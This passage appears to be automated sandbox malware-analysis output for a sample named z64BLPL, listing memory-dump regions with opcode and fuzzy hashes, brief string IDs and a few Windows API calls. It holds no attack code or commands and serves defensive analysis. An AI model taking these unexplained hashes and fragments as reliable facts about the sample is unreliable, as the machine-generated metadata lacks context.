                                                          • Opcode Fuzzy Hash: 1e14d58b619f1828f8e6c7ac2e5be3ea93fd31e8174c952190f8431dd28dc5cc
                                                          • Instruction Fuzzy Hash: 9A818D70A00505AFCB14DF69C885AAABBF2BF89355F28C1A9D405DB365DB31EC41CB71
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'^q$4'^q
                                                          • API String ID: 0-2697143702
                                                          • Opcode ID: 44bc0a74678563d84729bdf27008f66610b18a4f064bc3b6fb61aca31e820ed6
                                                          • Instruction ID: 2c0cbddf5d0c380c916bad2dda1c98575da23209480fe666f60e00e2aadc4493
                                                          • Opcode Fuzzy Hash: 44bc0a74678563d84729bdf27008f66610b18a4f064bc3b6fb61aca31e820ed6
                                                          • Instruction Fuzzy Hash: AF51B2307003089FDB05DF69D894BAABBE6EB88310F188465E949CB355DBB1CC01C7B1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (o^q$(o^q
                                                          • API String ID: 0-1946778100
                                                          • Opcode ID: 25a06a72708af650c6c89086d3abad23866dff80419a698747274b401ceb4155
                                                          • Instruction ID: 053a409257e786fd6d41845dbcc78c2204f4501fbde6cb6aab7ac52b251c6322
                                                          • Opcode Fuzzy Hash: 25a06a72708af650c6c89086d3abad23866dff80419a698747274b401ceb4155
                                                          • Instruction Fuzzy Hash: C83193317042049FC7089B69E814B6E7BE6BFC8751F28446AEA16D73A1DF31DD01CBA5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Xbq$Xbq
                                                          • API String ID: 0-1243427068
                                                          • Opcode ID: 3441844ae3f0d7623a063c126ed3b21722b7decf82e19b117383740f1d525493
                                                          • Instruction ID: ec27d944335fd2cde8a18c35f79e90a6a7ab837607c933c67775ef8b05a9319b
                                                          • Opcode Fuzzy Hash: 3441844ae3f0d7623a063c126ed3b21722b7decf82e19b117383740f1d525493
                                                          • Instruction Fuzzy Hash: DB31C4327043248BDF184A7AAB9437EA6AAABC4351F2C443DD806D3394DFB5CE4597B1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $^q$$^q
                                                          • API String ID: 0-355816377
                                                          • Opcode ID: 075f0f58e39f9f20b2123044f9316ff9ffd424c8c9da7bbe679b4d2e1d617d10
                                                          • Instruction ID: 097f6b84e7e922ffb1ba4081a0e9e0a507e1fae59738979e8ab60169e10ef7f6
                                                          • Opcode Fuzzy Hash: 075f0f58e39f9f20b2123044f9316ff9ffd424c8c9da7bbe679b4d2e1d617d10
                                                          • Instruction Fuzzy Hash: DB31A1313043158FCB299B29C89463E7BA7BF84711F28446AF452CB2A2EF28DC81D775
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LR^q
                                                          • API String ID: 0-2625958711
                                                          • Opcode ID: 37192fbfe3e583b92d8144c13567feb3eb822e4c63d40141c030c1fb9f6e51f3
                                                          • Instruction ID: a4759426d1948861ad45bccaee6d70d491931aad5c73a8c5ba6d05228840f5d8
                                                          • Opcode Fuzzy Hash: 37192fbfe3e583b92d8144c13567feb3eb822e4c63d40141c030c1fb9f6e51f3
                                                          • Instruction Fuzzy Hash: E8528D74911219CFCB54EF64ED94B9DBBB2FB48301F1085A9D409A7369DB30AE86CF90
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LR^q
                                                          • API String ID: 0-2625958711
                                                          • Opcode ID: 399cb3a3c5163223546a34212cf835afcca6313b8bf33539cb71342d6785f419
                                                          • Instruction ID: a2f0f84c2f0c3fc65f61735b792527e32a089cb806c7192815436ef44ae3fe04
                                                          • Opcode Fuzzy Hash: 399cb3a3c5163223546a34212cf835afcca6313b8bf33539cb71342d6785f419
                                                          • Instruction Fuzzy Hash: CB529D74911219CFCB54EF64ED94B9DBBB2FB48301F1085A9D409A7368DB30AE86CF90
                                                          APIs
                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00BF7322
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4120020108.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_bf0000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID: CreateWindow
                                                          • String ID:
                                                          • API String ID: 716092398-0
                                                          • Opcode ID: 8d0ffe9a6fc53da48a6bb0ffd4d4e43ce85aa0724a8de6aeae45d158123bd6e7
                                                          • Instruction ID: aab6d73c94cffcae34819c37d6761bb0e49c07064de6d674109d3a672ad9cfba
                                                          • Opcode Fuzzy Hash: 8d0ffe9a6fc53da48a6bb0ffd4d4e43ce85aa0724a8de6aeae45d158123bd6e7
                                                          • Instruction Fuzzy Hash: 1751CDB1D04349AFDB14CFA9C884ADEBBF5FF48310F24856AE918AB250DB719845CF91
                                                          APIs
                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 00BF9A11
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4120020108.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_bf0000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID: CallProcWindow
                                                          • String ID:
                                                          • API String ID: 2714655100-0
                                                          • Opcode ID: 8369814602c6f3943efe3fb1e9f9047c5404b69068d2089bacba9fefa4702e1f
                                                          • Instruction ID: 1e6e8d448b1ad24182222942f4f611aa0020911476090078f971a6191443e960
                                                          • Opcode Fuzzy Hash: 8369814602c6f3943efe3fb1e9f9047c5404b69068d2089bacba9fefa4702e1f
                                                          • Instruction Fuzzy Hash: 5E4119B5A00209CFCB14DF59C488BAABBF5FF88314F24C499D619AB321D775A845CFA0
                                                          APIs
                                                          • LdrInitializeThunk.NTDLL(00000000), ref: 06699BEE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4125146459.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6690000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 8785082d21a0f9f8906029083f1c490712aa8516bc3f7e4eb0aa699051b83517
                                                          • Instruction ID: 28d88fbccc9090343e66940ce9eb60b9457d09af3ea3613f4a141e6b124b535d
                                                          • Opcode Fuzzy Hash: 8785082d21a0f9f8906029083f1c490712aa8516bc3f7e4eb0aa699051b83517
                                                          • Instruction Fuzzy Hash: 2E11AF74E01109CFDF44DFA8D884AADBBF9FB88314F18C229E804E7245DB30A941CB60
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00BF5286
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4120020108.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_bf0000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID: HandleModule
                                                          • String ID:
                                                          • API String ID: 4139908857-0
                                                          • Opcode ID: f8041b3e5ddc6f360116f10df6a5ea02319b2bbc28ba1f97d3cee5a220d948ae
                                                          • Instruction ID: 528362bfb0b998b050de92983b6911ec5e62ff4d5428e03d15e18f93767e24a6
                                                          • Opcode Fuzzy Hash: f8041b3e5ddc6f360116f10df6a5ea02319b2bbc28ba1f97d3cee5a220d948ae
                                                          • Instruction Fuzzy Hash: 3D110FB6C006498FCB20CF9AC444ADEFBF4EB88320F10856AD918B7210C375A949CFA1
                                                          APIs
                                                          • OleInitialize.OLE32(00000000), ref: 00BFBEED
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4120020108.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_bf0000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID: Initialize
                                                          • String ID:
                                                          • API String ID: 2538663250-0
                                                          • Opcode ID: 936a89732aebd2edfc10414ce42694645ac0a6525d8027adcb29a571493e8ba0
                                                          • Instruction ID: 038a4b0e9a665ca4d058a82642c870462a3003873a33ba7cc7114f314ceb39eb
                                                          • Opcode Fuzzy Hash: 936a89732aebd2edfc10414ce42694645ac0a6525d8027adcb29a571493e8ba0
                                                          • Instruction Fuzzy Hash: 211115B5904348CFDB20DF9AD544BDEFBF4EB48320F208459E619A7210D375A948CFA5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6dae50f395635a3e6d5e574c0973b2137251d22795f2727dc9bc2735405d5829
                                                          • Instruction ID: e1d893d0fe3c100c32331cd103595527f7d9d589319f8d700bf12800d9e8b457
                                                          • Opcode Fuzzy Hash: 6dae50f395635a3e6d5e574c0973b2137251d22795f2727dc9bc2735405d5829
                                                          • Instruction Fuzzy Hash: 3012A9740217528FE2483F30EAAC62EBB61FB5F3677446D61F81AC9265DF7042858E71
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b4f54feba10a03220dcb49b22af9348b651824d2caeb09345d54e15649bd5f7d
                                                          • Instruction ID: fce11190a4487ca140934bd364940b8ca161e905db95d790f54fbd5edf98a3b0
                                                          • Opcode Fuzzy Hash: b4f54feba10a03220dcb49b22af9348b651824d2caeb09345d54e15649bd5f7d
                                                          • Instruction Fuzzy Hash: D31298740217028FA2483F30EAAC62EBB61FB5F3677446D61F81FC5265AF7042888E71
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: db562f63409511f62dc644609c26c446271429fba1e9803355470c3cc37b37c4
                                                          • Instruction ID: 17d9d83fdfe01677cd9efbd943307bdd078122d08e9c95d64405049b04e3b21d
                                                          • Opcode Fuzzy Hash: db562f63409511f62dc644609c26c446271429fba1e9803355470c3cc37b37c4
                                                          • Instruction Fuzzy Hash: 4081F0309016069FC711CF2CD8909AAFBF6EF85320F18C666E86897366D771E851CBB1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d3353e4704cd57c48d3b512ebb6321da71f96e2813cf38a5f56f2fe38c32c0d1
                                                          • Instruction ID: 094583b1306aee9f69da5abaa2c4fb6a52f07e1bd7e3913733d9edba536e5f24
                                                          • Opcode Fuzzy Hash: d3353e4704cd57c48d3b512ebb6321da71f96e2813cf38a5f56f2fe38c32c0d1
                                                          • Instruction Fuzzy Hash: 217136387017098FCB15DF68C894A6A7BE6AF99341F1900A9F816DB371DB70DC41EB64
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 17ce75859874a9652a3425b29e901ff427ac139fcafdc19a766f0f632aea0f89
                                                          • Instruction ID: 921ae1d5a325191580193bc52f939dcb37c7d3fd4eee87dd308d9e4b02286828
                                                          • Opcode Fuzzy Hash: 17ce75859874a9652a3425b29e901ff427ac139fcafdc19a766f0f632aea0f89
                                                          • Instruction Fuzzy Hash: 31510174D01318DFDB14DFA5D984AADBBB2FF88300F208529E809AB3A4DB35594ACF51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 552f943d6bdb44ba9c42f6310b0381bc300a3935bed91a50fc371e54449bf093
                                                          • Instruction ID: 012fe9bfc76af3bc498ab145a4b473cb33ce2f78a72668e6c61b7ef7d62eefeb
                                                          • Opcode Fuzzy Hash: 552f943d6bdb44ba9c42f6310b0381bc300a3935bed91a50fc371e54449bf093
                                                          • Instruction Fuzzy Hash: B6519674E01218DFDB48DFA9D984A9DBBF2FF89310F248169E409AB365DB30A905CF50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4d7d7a4d27b57b7d0b725fc8b55b6475acaa57fd6f3c0731f80eabe663fd105a
                                                          • Instruction ID: 83ce6364c95db8107334fc13a2624d708f960a140d1136a848916e36d54a52bb
                                                          • Opcode Fuzzy Hash: 4d7d7a4d27b57b7d0b725fc8b55b6475acaa57fd6f3c0731f80eabe663fd105a
                                                          • Instruction Fuzzy Hash: B1519374E01208CFCB48DFA9D59499DBBF2FF89314F209469E819AB364DB35A942CF50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a7a50117a6687e70f13efe95bfb525b4bf7778f62cee172ae40602f6f4d979ef
                                                          • Instruction ID: ba8a726e55ebb79bf50320450a6b30d8e139338c93fe11f5e9fef6d2dd3fbbf6
                                                          • Opcode Fuzzy Hash: a7a50117a6687e70f13efe95bfb525b4bf7778f62cee172ae40602f6f4d979ef
                                                          • Instruction Fuzzy Hash: 21419F31B00249DFCF11CFACC844A9EBBB2FF49350F148156E999AB2A1D374E954CB62
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 441f48d60b429e0c9e3e119fc4aff17083d12f3d14138a8af7ac7aebe3e25a8f
                                                          • Instruction ID: 6aa876989d53fc5c4b01fc2ed6cfbe15e993cea39ab9e0b903af3a8c0764b10c
                                                          • Opcode Fuzzy Hash: 441f48d60b429e0c9e3e119fc4aff17083d12f3d14138a8af7ac7aebe3e25a8f
                                                          • Instruction Fuzzy Hash: 0C41D271A083489FCB288F64C844B6ABBF2EB44310F18846AE855DB262DB75DD45CBA1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4a9f883af1346264cb4f018963c449120641d5f3cff3e8a3944ddcd3ec24bfda
                                                          • Instruction ID: bb8fd224db5434786711e324916d042466c4d57e02b842b609c08314f3098ab2
                                                          • Opcode Fuzzy Hash: 4a9f883af1346264cb4f018963c449120641d5f3cff3e8a3944ddcd3ec24bfda
                                                          • Instruction Fuzzy Hash: 28318D71600249DFCF059F64E855AAE3BA2EB88312F148029FD15D7398CB75CD21DBB0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 72ed4eb19ae4abbb3f77828766730288ab26e03b30f01e37f02de8bf95d9d1a0
                                                          • Instruction ID: e1e8d00e0622333e908172f2ba46b35efc1988b6d9a620f2206bb6ff8b5481da
                                                          • Opcode Fuzzy Hash: 72ed4eb19ae4abbb3f77828766730288ab26e03b30f01e37f02de8bf95d9d1a0
                                                          • Instruction Fuzzy Hash: DB313674D05309CFCB05DFA9E8546EDBFB4FF4A310F1051AAD444A7260EB305A85CBA1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 950716576ee28a3e1243aa751e7e18062259677f229cef6e5ea2c30964524489
                                                          • Instruction ID: 26f3d044007ff5d5bb71297721b1e6023d2694ecbb522217debb3e0a8c17c089
                                                          • Opcode Fuzzy Hash: 950716576ee28a3e1243aa751e7e18062259677f229cef6e5ea2c30964524489
                                                          • Instruction Fuzzy Hash: F4219F717003064BDB155B25C95473E6697AFD4759F288039F806CBBA8EE76CC42F3A2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4120233523.0000000000CDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CDD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_cdd000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fad543b1df6767cab8bffa963948f5072cfb03f21fff5686d3694c52bd8ab2a0
                                                          • Instruction ID: 1b652e0ebbbc7a1923ba3f5db0fb0462b0cff1b7e0e1c23c9e33dff69900fa92
                                                          • Opcode Fuzzy Hash: fad543b1df6767cab8bffa963948f5072cfb03f21fff5686d3694c52bd8ab2a0
                                                          • Instruction Fuzzy Hash: 7C310C7550E3C09FD7138B24C9A4715BF71AF47214F2985DBD9898F2A7C22A980ACB62
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 264817ebe50f94bea2b346904c3d478d6cc62b6a92ea43101769af2b48c61229
                                                          • Instruction ID: 273e732bde9c9dfc8e6e31169bac31d9ca03748a58fef769ba7848ff5dc7a11e
                                                          • Opcode Fuzzy Hash: 264817ebe50f94bea2b346904c3d478d6cc62b6a92ea43101769af2b48c61229
                                                          • Instruction Fuzzy Hash: 612180357056119FC7159B29D854A2EB7A2EFC9756B1C806AE806DB3A4CF30DC02CBA0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c914d19ffb21a916d757f4acf1e3cfc808f09a24c22b50740b5d6d469bd0f4b6
                                                          • Instruction ID: 4231593d5267cb3d0be4cd34386e008fa0a93d0ee1bcb84f8540ec6b51028e89
                                                          • Opcode Fuzzy Hash: c914d19ffb21a916d757f4acf1e3cfc808f09a24c22b50740b5d6d469bd0f4b6
                                                          • Instruction Fuzzy Hash: 9A218C75E001159FCB24DF24C840AFE77A5EBA9364F248419D84A9B240DB34EE43CBE2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4120233523.0000000000CDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CDD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_cdd000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9c9031fd43d4e9d84705c7bf7c2dbcc84b0f37753df073558021512f698af362
                                                          • Instruction ID: 7452d22d7495a3d981996655ba632ac832903c7b2f5d2b4135c5bfb0a16d9ddf
                                                          • Opcode Fuzzy Hash: 9c9031fd43d4e9d84705c7bf7c2dbcc84b0f37753df073558021512f698af362
                                                          • Instruction Fuzzy Hash: 7D212671904204EFCB14DF24D9C4B26BBA5FBC4314F24C56EEA4A4B352C73AE846CB62
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fae6ebce14fdf0cdf6c58cbb25d955b28b2b326841ec6ec54aa9688985d3bcf8
                                                          • Instruction ID: 67730b2c5b36a498c9e138a2e90d9f89ac16775b19f80c9b5b834675631a9ab6
                                                          • Opcode Fuzzy Hash: fae6ebce14fdf0cdf6c58cbb25d955b28b2b326841ec6ec54aa9688985d3bcf8
                                                          • Instruction Fuzzy Hash: F631BF78E01309CFCB44EFA8E59499DBBB2FF49305B204469E819AB324D731AD42CF51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1d8ffe2d63f4db00f79f782687cb06f9e7ac04af0dedf39f8afbc379a0ae297e
                                                          • Instruction ID: c09fa93764d1b02385ce7c48d2e663253edc8afacb2dbeea3318851013b27cf5
                                                          • Opcode Fuzzy Hash: 1d8ffe2d63f4db00f79f782687cb06f9e7ac04af0dedf39f8afbc379a0ae297e
                                                          • Instruction Fuzzy Hash: 2921A1716056489FDB04AF64E845BAE3BA1EB44321F148069FC06DB358CB74CE55DBB0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cad639db71996e9f3c6ce628d244a3f2d85baf73eaa917d4a4a66f1a4ac60531
                                                          • Instruction ID: fe21fd54b090f8bd26ab77538ff3135aafc20029b61c0f023376b976a75c41fd
                                                          • Opcode Fuzzy Hash: cad639db71996e9f3c6ce628d244a3f2d85baf73eaa917d4a4a66f1a4ac60531
                                                          • Instruction Fuzzy Hash: 76217A70E012489FDB14CFA5D560AEEBFB6EF49301F288069E801E63A4DB30D941DB30
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 52897e3efebd251d9728634fbb80e9f58f8e03e1217f2714f5b391454c8ebbb3
                                                          • Instruction ID: 8179d787601d4ae4a672a28c8a775aff44afd35022c9f1a0e15778ee2f1c08e4
                                                          • Opcode Fuzzy Hash: 52897e3efebd251d9728634fbb80e9f58f8e03e1217f2714f5b391454c8ebbb3
                                                          • Instruction Fuzzy Hash: CF113076B012049BCB149F58DC55A9DBBB5FF8C721F144026FA15E7394DB719C10CBA1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fef495dc980d8f8ca00588d29f0bdaf41f30b2789a3db611c086fb0ba2d48d1a
                                                          • Instruction ID: ef1db408696c98a6ebfdf245ea86b05dd3098ededd7f2f03b308290d4cc205a8
                                                          • Opcode Fuzzy Hash: fef495dc980d8f8ca00588d29f0bdaf41f30b2789a3db611c086fb0ba2d48d1a
                                                          • Instruction Fuzzy Hash: F82160B0D012099FDB45EFA9D980B9EBFF2FB45300F10D579D1549B365EB709A458B80
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e307585c4455fd515adba2ccfcd3a068fbd28b048e3b0b3a9da5f26aa4301c04
                                                          • Instruction ID: 0d2b8a11a5933c019cd8a84c6c72dfc6e91c0896172a04ab40aa2472658ed428
                                                          • Opcode Fuzzy Hash: e307585c4455fd515adba2ccfcd3a068fbd28b048e3b0b3a9da5f26aa4301c04
                                                          • Instruction Fuzzy Hash: 6111A535701611AFC7159B2AD85493EB7A6FFC576271D8079E806CB360CF31DC028BA0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8de497673c50882bbf6db21531757ecbfc2c41fb5f3c1bdc55a475ab1189344d
                                                          • Instruction ID: 24b4c556353a09f61cbfa074be62889918a0cf066c5fdeb18b138454177a773a
                                                          • Opcode Fuzzy Hash: 8de497673c50882bbf6db21531757ecbfc2c41fb5f3c1bdc55a475ab1189344d
                                                          • Instruction Fuzzy Hash: D121BD74D0530ACFCB01EFA9D8545EEBBF4BF0A301F10526AD815B6260EB345A85CFA5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
